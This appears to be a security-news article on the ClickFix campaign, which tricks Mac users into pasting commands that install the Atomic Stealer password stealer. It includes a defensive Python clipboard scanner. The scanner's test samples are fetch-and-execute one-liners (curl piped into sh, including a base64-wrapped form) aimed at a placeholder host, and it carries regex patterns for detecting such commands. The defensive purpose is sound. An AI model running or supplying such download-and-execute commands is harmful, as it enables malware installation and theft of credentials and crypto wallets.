Massive web-watering-hole campaign uncovered
Security researchers at BadByte have identified more than 2,800 hacked websites funnelling Mac visitors into an infection chain dubbed “ClickFix.” The operation delivers the password‑stealing Atomic Stealer (AMOS) malware and is one of the largest macOS‑focused campaigns seen to date.
How ClickFix hijacks your Mac
- Bogus verification prompt – Victims land on a legitimate‑looking page that pops up a fake Google reCAPTCHA asking them to click “I’m not a robot.”
- Clipboard sleight‑of‑hand – The click silently copies an obfuscated command to the user’s clipboard.
- Social‑engineering twist – The pop‑up then instructs the user to open Terminal and paste the code “to complete verification.”
- Stealer delivered – Pressing Return triggers a curl command that downloads and executes Atomic Stealer.
Previous ClickFix waves targeted Windows PCs; this variant checks the visitor’s user‑agent string and aborts if it detects Windows or Linux, keeping its sights firmly on macOS.
What Atomic Stealer can grab
- Keychain passwords and iCloud tokens
- Cookies, autofill data and saved logins from Chrome, Firefox and Brave
- Files in Desktop and Documents folders, including PDFs and crypto‑wallet seed phrases
- Private keys and balances from more than 50 browser‑based and standalone crypto wallets
AMOS is sold on a malware‑as‑a‑service model for about US $3,000 per month, letting less‑skilled crooks run campaigns at scale.
Why it evades many defences
Because users themselves paste the command, the payload bypasses gateway filters and most macOS quarantine checks. Traditional AV engines often flag nothing until after the stealer executes. This human‑in‑the‑loop trick lets ClickFix slip through Apple’s built‑in XProtect signatures and some endpoint‑detection tools.
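The infection chain above ends with the user pasting a download-and-execute one-liner into Terminal, and this section explains why that step slips past gateway and quarantine checks. The script below is an added example, not code from BadByte or from any security product: a small triage routine that inspects text about to be pasted (or pulled from the macOS clipboard with `pbpaste`) and flags the ClickFix pattern, a `curl`/`wget` download fed straight into a shell, including when it is wrapped in base64 so the victim cannot read it. All sample commands are constructed for the demonstration and use the reserved `example.invalid` hostname; nothing is downloaded.

```python
import base64
import re
import subprocess

# Constructed sample clipboard contents (not payloads captured from the campaign).
SAMPLES = {
    "benign": "ls -la ~/Documents",
    "curl_pipe_sh": "curl -fsSL https://example.invalid/setup.sh | sh",
    "eval_subst": 'bash -c "$(curl -s https://example.invalid/x)"',
    # The inner command is base64-encoded at import time so the sample stays readable.
    "base64_wrapped": "echo "
    + base64.b64encode(b"curl -fsSL https://example.invalid/a | sh").decode()
    + " | base64 -d | sh",
}

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
# A shell as the consumer of a pipe, "sh -c", or a command-substitution around a downloader.
SHELL_SINK = re.compile(r"\|\s*(sh|bash|zsh)\b|\b(sh|bash|zsh)\s+-c\b|\$\(\s*(curl|wget)")
# Both GNU (-d/--decode) and macOS (-D) base64 decode flags.
DECODE_STEP = re.compile(r"base64\s+(-d|-D|--decode)\b")
# Long runs of base64 alphabet characters worth trying to decode.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_layers(text: str, max_depth: int = 3) -> list[str]:
    """Return the text followed by every printable base64 payload it embeds, decoded recursively."""
    layers = [text]
    frontier = [text]
    for _ in range(max_depth):
        new_layer = []
        for chunk in frontier:
            for token in B64_TOKEN.findall(chunk):
                try:
                    decoded = base64.b64decode(token, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # not valid base64, or not text: skip it
                if all(c.isprintable() or c in "\n\t" for c in decoded):
                    new_layer.append(decoded)
        if not new_layer:
            break
        layers.extend(new_layer)
        frontier = new_layer
    return layers


def assess(command: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing ClickFix-like was seen."""
    findings = []
    for depth, layer in enumerate(decode_layers(command)):
        downloader = DOWNLOADER.search(layer) is not None
        sink = SHELL_SINK.search(layer) is not None
        if downloader and sink:
            findings.append(f"layer {depth}: remote download piped straight into a shell")
        elif depth > 0 and (downloader or sink):
            findings.append(f"layer {depth}: downloader or shell hidden inside base64")
    if DECODE_STEP.search(command):
        findings.append("layer 0: base64 decode step, so the user cannot read what will run")
    return findings


def is_clickfix_like(command: str) -> bool:
    return bool(assess(command))


def clipboard_text() -> str:
    """Read the live clipboard on macOS via pbpaste; returns '' anywhere pbpaste is unavailable."""
    try:
        return subprocess.run(["pbpaste"], capture_output=True, text=True, check=True).stdout
    except (FileNotFoundError, subprocess.CalledProcessError):
        return ""


def scan_samples() -> dict[str, bool]:
    """Run the detector over the constructed samples; used by the stand-alone demo below."""
    return {name: is_clickfix_like(cmd) for name, cmd in SAMPLES.items()}


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name}: {assess(cmd) or 'clean'}")
    live = clipboard_text()
    if live:
        print("current clipboard:", assess(live) or "clean")
```

The decoder is deliberately recursive because a single `echo … | base64 -d | sh` is the cheapest way to hide `curl … | sh` from a user reading the pasted text; a detector that only looks at the outer string would see a shell sink but no download and stay quiet. Run stand-alone it prints a verdict per sample and, on a Mac, for whatever is on the clipboard right now.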
Staying safe: five quick wins
| Step | Why it matters |
|---|---|
| Close unexpected CAPTCHA pop‑ups immediately | Real reCAPTCHAs never ask you to open Terminal. |
| Run the latest macOS and browser versions | Each update expands XProtect and removes vulnerable WebKit components. |
| Install a reputable Mac AV with real‑time web filtering | Adds behaviour‑based detection of clipboard‑injection tricks. |
| Use a standard (non‑admin) account for daily work | Limits the damage if a rogue script executes. |
| Harden your crypto wallets | Store seeds offline and enable passphrases to thwart automated grabs. |
Bigger picture
ClickFix shows how effortless social engineering can trump sophisticated technical exploits. With thousands of legitimate domains hijacked, even security‑savvy users may stumble into the trap. Until browsers can reliably flag clipboard manipulations and fake CAPTCHA overlays, vigilance—and sharing these red flags with less‑technical friends and family—remains the best defence.
Bottom line: If a website ever tells you to copy code into Terminal to prove you’re human, you’re moments away from handing crooks your keys, cookies and crypto. Close the tab, clear your clipboard, and move on.